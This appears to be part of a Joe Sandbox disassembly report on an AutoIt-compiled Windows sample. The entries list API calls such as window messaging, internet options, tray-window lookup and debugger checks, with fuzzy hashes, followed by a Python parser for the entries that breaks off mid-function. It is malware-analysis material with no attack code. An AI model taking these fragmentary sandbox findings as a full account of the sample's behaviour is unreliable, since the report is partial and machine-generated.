                                                  • Instruction Fuzzy Hash: 6131F231A00315BBEB24EF49EC85BEEBBF8EF05350F140029ED91A65A0D7709A80DB11
                                                  APIs
                                                  • __snwprintf.LIBCMT ref: 00C33A66
                                                    • Part of subcall function 00BC7DE1: _memmove.LIBCMT ref: 00BC7E22
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                  • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: __snwprintf_memmove
                                                  • String ID: , $$AUTOITCALLVARIABLE%d
                                                  • API String ID: 3506404897-2584243854
                                                  • Opcode ID: 3f8e4abe6b144d009f633fbf8584fc63281a26cd402c636d2b0fd01da1787d6e
                                                  • Instruction ID: 071556d13928791874e337a40715c4364093867c25fe23aece533637757f848f
                                                  • Opcode Fuzzy Hash: 3f8e4abe6b144d009f633fbf8584fc63281a26cd402c636d2b0fd01da1787d6e
                                                  • Instruction Fuzzy Hash: 54219E30740259ABCF11EFA4CC86EAE77F5EF44710F5044A8F549AB181DB30EA45DB61
                                                  APIs
                                                  • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 00C46761
                                                  • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00C4676C
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                  • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: MessageSend
                                                  • String ID: Combobox
                                                  • API String ID: 3850602802-2096851135
                                                  • Opcode ID: f5d5c68596bf4a3900969671d6ac37a81ccae8d5b34030690a9acfe3897b43ed
                                                  • Instruction ID: c719ec5791ae2a6cb7679d1a950b77844b41a91be46afac785915ad34bd1617f
                                                  • Opcode Fuzzy Hash: f5d5c68596bf4a3900969671d6ac37a81ccae8d5b34030690a9acfe3897b43ed
                                                  • Instruction Fuzzy Hash: 7F11B275200208AFEF118F54CC80FFB376AFB4A3A8F114129F92897294D671DD5187A1
                                                  APIs
                                                    • Part of subcall function 00BC1D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00BC1D73
                                                    • Part of subcall function 00BC1D35: GetStockObject.GDI32(00000011), ref: 00BC1D87
                                                    • Part of subcall function 00BC1D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00BC1D91
                                                  • GetWindowRect.USER32(00000000,?), ref: 00C46C71
                                                  • GetSysColor.USER32(00000012), ref: 00C46C8B
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                  • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: Window$ColorCreateMessageObjectRectSendStock
                                                  • String ID: static
                                                  • API String ID: 1983116058-2160076837
                                                  • Opcode ID: 56b232196719f10294efd71676d671efb60e24015c143951aafa845a28685c97
                                                  • Instruction ID: 35659d772313c5fd0dda4f652a93078a5137d842b58f3de9c1e3c560153a0b19
                                                  • Opcode Fuzzy Hash: 56b232196719f10294efd71676d671efb60e24015c143951aafa845a28685c97
                                                  • Instruction Fuzzy Hash: DB212676620209AFDF04DFA8CC85EFA7BB8FB09314F014629FD95E2250D635E851DB61
                                                  APIs
                                                  • GetWindowTextLengthW.USER32(00000000), ref: 00C469A2
                                                  • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 00C469B1
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                  • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: LengthMessageSendTextWindow
                                                  • String ID: edit
                                                  • API String ID: 2978978980-2167791130
                                                  • Opcode ID: 4df4126315ceab836f9e8073f280e3efc1792409157a58d7643b38a937ff908f
                                                  • Instruction ID: 316bc1eb6687617939556b1ecbdf38530613c448138fb32f36344d83aff08c57
                                                  • Opcode Fuzzy Hash: 4df4126315ceab836f9e8073f280e3efc1792409157a58d7643b38a937ff908f
                                                  • Instruction Fuzzy Hash: 14116A71510208ABEB108E649C40BEB37A9FB263B8F504728F9B5971E4C6B1DC91A761
                                                  APIs
                                                  • _memset.LIBCMT ref: 00C22A22
                                                  • GetMenuItemInfoW.USER32(00000030,?,00000000,00000030), ref: 00C22A41
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                  • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: InfoItemMenu_memset
                                                  • String ID: 0
                                                  • API String ID: 2223754486-4108050209
                                                  • Opcode ID: 1aae66eb6c43eb786e2a03ab1ed818ba6bdd80f6b07f7bf727bf9d2c6e977245
                                                  • Instruction ID: 97898033623ef7ecd63895371f43fda29d6cf5eb7ecbe5565b9371d0ca20310f
                                                  • Opcode Fuzzy Hash: 1aae66eb6c43eb786e2a03ab1ed818ba6bdd80f6b07f7bf727bf9d2c6e977245
                                                  • Instruction Fuzzy Hash: 3711D372D01124FBCB34EB58EC44BAEB3A8AB45300F044021E865EBA90D770AE06E791
                                                  APIs
                                                  • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 00C3222C
                                                  • InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 00C32255
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                  • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: Internet$OpenOption
                                                  • String ID: <local>
                                                  • API String ID: 942729171-4266983199
                                                  • Opcode ID: 214648ab68aff3713c775639475976851171a8b53d53061dbfa892b4a03c6b1a
                                                  • Instruction ID: d0473b155adc082d42699d12ee10a20d0cb7e2f402511cd64ff34121d005b10a
                                                  • Opcode Fuzzy Hash: 214648ab68aff3713c775639475976851171a8b53d53061dbfa892b4a03c6b1a
                                                  • Instruction Fuzzy Hash: F111C270551225BADF258F52CC88FFBFBA8FF16761F10822AFA2546000D2715A95D6F0
                                                  APIs
                                                    • Part of subcall function 00BC7DE1: _memmove.LIBCMT ref: 00BC7E22
                                                    • Part of subcall function 00C1AA99: GetClassNameW.USER32(?,?,000000FF), ref: 00C1AABC
                                                  • SendMessageW.USER32(?,000001A2,000000FF,?), ref: 00C18E73
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                   • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: ClassMessageNameSend_memmove
                                                  • String ID: ComboBox$ListBox
                                                  • API String ID: 372448540-1403004172
                                                  • Opcode ID: e336981018094eaa02a0cfa07be73aabfcaf1d96f330475636a7d05eb00165c9
                                                  • Instruction ID: 7881a21281ff742bc231753ec1a0418242dbd956050e523375ad8d97be59034a
                                                  • Opcode Fuzzy Hash: e336981018094eaa02a0cfa07be73aabfcaf1d96f330475636a7d05eb00165c9
                                                  • Instruction Fuzzy Hash: 6C0128B5645219ABCB14EBA0CC41DFE73A8EF07360F14066DF836672D1DE31584CEA60
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                   • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: __fread_nolock_memmove
                                                  • String ID: EA06
                                                  • API String ID: 1988441806-3962188686
                                                  • Opcode ID: b5258a58f5e4f9d39cf3389db30ac179d656ecd32869c0b4d73ee4c0270ea66e
                                                  • Instruction ID: f5f21431cafa782adbc6544c97152dd43261828a5aca646679ee872c00332466
                                                  • Opcode Fuzzy Hash: b5258a58f5e4f9d39cf3389db30ac179d656ecd32869c0b4d73ee4c0270ea66e
                                                  • Instruction Fuzzy Hash: 6001F971D042587EDB28CAA9C816EFE7BF8DB11311F00459AF552D2181E974E6088760
                                                  APIs
                                                    • Part of subcall function 00BC7DE1: _memmove.LIBCMT ref: 00BC7E22
                                                    • Part of subcall function 00C1AA99: GetClassNameW.USER32(?,?,000000FF), ref: 00C1AABC
                                                  • SendMessageW.USER32(?,00000180,00000000,?), ref: 00C18D6B
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                   • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: ClassMessageNameSend_memmove
                                                  • String ID: ComboBox$ListBox
                                                  • API String ID: 372448540-1403004172
                                                  • Opcode ID: f703fddc95be09b4a04baaf466b4fe9e703b1335a589adeb310bbe9c503fbb2e
                                                  • Instruction ID: f2dc3af1824cb1a809a10151566f97608f228adaadcbd66197fe5038c78fd975
                                                  • Opcode Fuzzy Hash: f703fddc95be09b4a04baaf466b4fe9e703b1335a589adeb310bbe9c503fbb2e
                                                  • Instruction Fuzzy Hash: F801D4B1A4520AABCF14EBA0C952FFE73A89F16340F100069B806672D1DE205E4CE672
                                                  APIs
                                                    • Part of subcall function 00BC7DE1: _memmove.LIBCMT ref: 00BC7E22
                                                    • Part of subcall function 00C1AA99: GetClassNameW.USER32(?,?,000000FF), ref: 00C1AABC
                                                  • SendMessageW.USER32(?,00000182,?,00000000), ref: 00C18DEE
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                   • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: ClassMessageNameSend_memmove
                                                  • String ID: ComboBox$ListBox
                                                  • API String ID: 372448540-1403004172
                                                  • Opcode ID: d05a968340057009b4ae0383b55968a4579f7271687754e3354ff451bf12b089
                                                  • Instruction ID: 7c16090ff98fb30212178de24d361d8919421988ec059ab202bb69958f0c20ac
                                                  • Opcode Fuzzy Hash: d05a968340057009b4ae0383b55968a4579f7271687754e3354ff451bf12b089
                                                  • Instruction Fuzzy Hash: E201F7B1A4520AA7CB10F6A4C942FFE73AC9F16340F104069B806B32D1DE215E4DF672
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                   • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: ClassName_wcscmp
                                                  • String ID: #32770
                                                  • API String ID: 2292705959-463685578
                                                  • Opcode ID: 2b20ec606c40a67039907a1afe522193be5868f62c3c8b452641ccde4f7e04eb
                                                  • Instruction ID: 34050569339bd020468ba851438bb7bb9bb6339529dedaab15a2ad10a3096cd8
                                                  • Opcode Fuzzy Hash: 2b20ec606c40a67039907a1afe522193be5868f62c3c8b452641ccde4f7e04eb
                                                  • Instruction Fuzzy Hash: E5E09B3250022867D7109695AC4ABA7F7ECEB55B60F000066FD14D3151D5609A4587E0
                                                  APIs
                                                    • Part of subcall function 00BFB314: _memset.LIBCMT ref: 00BFB321
                                                    • Part of subcall function 00BE0940: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000,?,00BFB2F0,?,?,?,00BC100A), ref: 00BE0945
                                                  • IsDebuggerPresent.KERNEL32(?,?,?,00BC100A), ref: 00BFB2F4
                                                  • OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,00BC100A), ref: 00BFB303
                                                  Strings
                                                  • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 00BFB2FE
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                   • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString_memset
                                                  • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
                                                  • API String ID: 3158253471-631824599
                                                  • Opcode ID: e5f699f4c18c8091615120019f6c95b0a558d1d53fbf09b52693ee6effd54bc1
                                                  • Instruction ID: 6e657a632182ea729f42616725f6c25eecc5d3aea3753a1334328e15fe548225
                                                  • Opcode Fuzzy Hash: e5f699f4c18c8091615120019f6c95b0a558d1d53fbf09b52693ee6effd54bc1
                                                  • Instruction Fuzzy Hash: 53E06DB46007048BDB30AF28E404B567AE4BF00358F0189BDE486C7251EBF5D848CBA1
                                                  APIs
                                                  • MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 00C17C82
                                                    • Part of subcall function 00BE3358: _doexit.LIBCMT ref: 00BE3362
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                   • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: Message_doexit
                                                  • String ID: AutoIt$Error allocating memory.
                                                  • API String ID: 1993061046-4017498283
                                                  • Opcode ID: 67259fcf211c74a507ca157a0b6897ca870f261239bc4b17dafbe08c31d2f4f3
                                                  • Instruction ID: c72752bbead7ad9ee179bb690cb3058a1ecb6cbad6102adaa61bd6d22eb6a4ac
                                                  • Opcode Fuzzy Hash: 67259fcf211c74a507ca157a0b6897ca870f261239bc4b17dafbe08c31d2f4f3
                                                  • Instruction Fuzzy Hash: ECD05B323C436836D11532A56C0BFDE79C84F06F52F044475FF08595D38AD255C151E9
                                                  APIs
                                                  • GetSystemDirectoryW.KERNEL32(?), ref: 00C01775
                                                    • Part of subcall function 00C3BFF0: LoadLibraryA.KERNEL32(kernel32.dll,?,00C0195E,?), ref: 00C3BFFE
                                                    • Part of subcall function 00C3BFF0: GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 00C3C010
                                                  • FreeLibrary.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000104), ref: 00C0196D
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                   • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: Library$AddressDirectoryFreeLoadProcSystem
                                                  • String ID: WIN_XPe
                                                  • API String ID: 582185067-3257408948
                                                  • Opcode ID: 11d5dfde17bc45424e649ddd3dc3a46ee454a1febcf0ea2b9e866fe14394a135
                                                  • Instruction ID: d55fd74df8f04a690389703f5236fbae3f85e55410472fef43c2e1bf32ec463c
                                                  • Opcode Fuzzy Hash: 11d5dfde17bc45424e649ddd3dc3a46ee454a1febcf0ea2b9e866fe14394a135
                                                  • Instruction Fuzzy Hash: 85F0E570800109DFDB15DFA9CA88BECBBF8BB18305F680099E512A71A0D7718F85DF61
                                                  APIs
                                                  • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00C459AE
                                                  • PostMessageW.USER32(00000000), ref: 00C459B5
                                                    • Part of subcall function 00C25244: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00C252BC
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                   • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: FindMessagePostSleepWindow
                                                  • String ID: Shell_TrayWnd
                                                  • API String ID: 529655941-2988720461
                                                  • Opcode ID: a87a0f36a79e6d4cc61fd2d5f915d8e1fffc08d1f6bc00c28fa36e5e7862a1a2
                                                  • Instruction ID: b0fd9a172dd805dad5cbb5708ddc4665408408c62d173051a9467aa94c773d1f
                                                  • Opcode Fuzzy Hash: a87a0f36a79e6d4cc61fd2d5f915d8e1fffc08d1f6bc00c28fa36e5e7862a1a2
                                                  • Instruction Fuzzy Hash: 90D012357C4311BBF6A4BB70AC0FFDB6614BB05B50F010839B349EA5D0D9F0A801C654
                                                  APIs
                                                  • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00C4596E
                                                  • PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 00C45981
                                                    • Part of subcall function 00C25244: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00C252BC
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                   • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: FindMessagePostSleepWindow
                                                  • String ID: Shell_TrayWnd
                                                  • API String ID: 529655941-2988720461
                                                  • Opcode ID: e610a88a353087351b7c022fe445bb42903ffde6d5f5f04716b494c937d708d3
                                                  • Instruction ID: 3ba23115c6a31149c0b72629fedb5274055ec81c9418acbbf8211af5a8acbdee
                                                  • Opcode Fuzzy Hash: e610a88a353087351b7c022fe445bb42903ffde6d5f5f04716b494c937d708d3
                                                  • Instruction Fuzzy Hash: 94D012357C4311B7E6A4BB70AC0FFDB6A14BF01B50F010839B349AA5D0D9F09801C654
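The API entries above show numeric arguments only (SendMessageW message 000001A2, InternetSetOptionW option 00000032, PostMessageW message 00000111, MessageBoxW type 00000010). The following Python script is an added example, not part of the Joe Sandbox report or its IDA plugin: it parses these `API.MODULE(args), ref: ADDR` lines and resolves the constants to their winuser.h / wininet.h names. Only constants that occur in this listing are tabulated; anything else is returned as a hex literal, and an argument the sandbox could not resolve (`?`) yields None. The sample lines fed to it are copied from the entries above.

```python
import re

# Matches one Joe Sandbox IDA plugin API entry, e.g.
#   • SendMessageW.USER32(?,000001A2,000000FF,?), ref: 00C18E73
API_LINE = re.compile(
    r"(?P<api>\w+)\.(?P<mod>\w+)\((?P<args>[^)]*)\), ref: (?P<ref>[0-9A-F]{8})"
)

# Window message identifiers from winuser.h (only those seen in this report)
WINDOW_MESSAGES = {
    0x0111: "WM_COMMAND",
    0x0180: "LB_ADDSTRING",
    0x0182: "LB_DELETESTRING",
    0x01A2: "LB_FINDSTRINGEXACT",
}

# MessageBoxW uType flag from winuser.h
MB_FLAGS = {0x10: "MB_ICONERROR"}

# InternetSetOptionW dwOption from wininet.h; 0x32 takes an
# INTERNET_CONNECTED_INFO structure, which is 8 bytes long
INTERNET_OPTIONS = {0x32: "INTERNET_OPTION_CONNECTED_STATE"}
INTERNET_OPTION_BUFFER_SIZES = {0x32: 8}

# For each API, which zero-based argument carries a decodable constant
DECODERS = {
    "SendMessageW": (1, WINDOW_MESSAGES),
    "PostMessageW": (1, WINDOW_MESSAGES),
    "MessageBoxW": (3, MB_FLAGS),
    "InternetSetOptionW": (1, INTERNET_OPTIONS),
}


def parse_api_line(line):
    """Return {"api", "module", "args", "ref"} for an API entry, else None."""
    m = API_LINE.search(line)
    if not m:
        return None
    raw_args = m.group("args")
    args = [a.strip() for a in raw_args.split(",")] if raw_args else []
    return {"api": m.group("api"), "module": m.group("mod"),
            "args": args, "ref": m.group("ref")}


def _hex_arg(args, idx):
    """Parse args[idx] as a hex value; None if absent or unresolved ('?')."""
    if idx >= len(args):
        return None
    try:
        return int(args[idx], 16)
    except ValueError:
        return None


def decode_call(entry):
    """Resolve the constant argument of a parsed entry to its symbolic name."""
    if entry is None or entry["api"] not in DECODERS:
        return None
    idx, table = DECODERS[entry["api"]]
    value = _hex_arg(entry["args"], idx)
    if value is None:
        return None
    return table.get(value, f"0x{value:X}")


def buffer_length_matches(entry):
    """For InternetSetOptionW, check dwBufferLength against the option's struct size."""
    if entry is None or entry["api"] != "InternetSetOptionW":
        return None
    option = _hex_arg(entry["args"], 1)
    length = _hex_arg(entry["args"], 3)
    expected = INTERNET_OPTION_BUFFER_SIZES.get(option)
    if expected is None or length is None:
        return None
    return length == expected


def annotate(lines):
    """Map ref address -> (api, decoded constant) for every API entry in lines."""
    result = {}
    for line in lines:
        entry = parse_api_line(line)
        if entry is not None and entry["api"] in DECODERS:
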